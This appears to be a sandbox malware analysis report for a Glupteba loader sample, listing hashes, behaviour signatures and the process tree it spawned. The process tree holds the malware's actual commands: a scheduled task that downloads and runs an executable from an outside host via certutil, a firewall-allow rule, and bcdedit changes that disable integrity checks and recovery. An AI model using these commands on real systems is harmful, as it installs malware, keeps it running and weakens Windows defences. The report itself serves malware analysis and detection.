Overview

overview

10

Static

static

app.exe

windows7_x64

10

app.exe

windows10_x64

10

Analysis

  • max time kernel
    118s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    17-10-2020 12:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    app.exe

  • Size

    3.7MB

  • MD5

    668aa92e65133ae444a91f3246a8b25f

  • SHA1

    ef196259a3c3c563103e09c65e4ab8bb7c6a1e3c

  • SHA256

    482027d0e151826c175ff084f6e76ce4ca3a920ca648fc2d5906ed0a793fe8ad

  • SHA512

    c8d35a7ac7e0ebbd9a0b2486e473b7001173ef7f21e449eb25b9591924d9f6dbdabd138016afca0192ad832e04d1e52bd82126cac3ed77ed9f1df44edf705393

Score
10/10
gluptebadiscoverydropperevasionloaderpersistencetrojan

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 2 IoCs
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • Loads dropped DLL 12 IoCs
  • Windows security modification 2 TTPs 12 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\app.exe
    "C:\Users\Admin\AppData\Local\Temp\app.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1620
    • C:\Users\Admin\AppData\Local\Temp\app.exe
      "C:\Users\Admin\AppData\Local\Temp\app.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:1996
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:768
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1416
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2024
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2044
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1852
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1364
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1080
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1400
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1232
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1536
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:984
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1220
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1756
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2040
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:396
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1104
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:1268

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/980-19-0x0000000002950000-0x0000000002961000-memory.dmp

    Filesize

    68KB

    Download

  • memory/980-18-0x00000000025A0000-0x0000000002949000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/1396-35-0x0000000002B50000-0x0000000002B51000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1512-33-0x000007FEF8510000-0x000007FEF878A000-memory.dmp

    Filesize

    2.5MB

    Download

  • memory/1620-1-0x0000000002770000-0x0000000002781000-memory.dmp

    Filesize

    68KB

    Download

  • memory/1620-0-0x00000000023C0000-0x0000000002769000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/1620-2-0x0000000000400000-0x0000000000B16000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1948-5-0x0000000000400000-0x0000000000B16000-memory.dmp

    Filesize

    7.1MB

    Download

  • memory/1948-3-0x0000000002380000-0x0000000002729000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/1948-4-0x0000000002730000-0x0000000002741000-memory.dmp

    Filesize

    68KB

    Download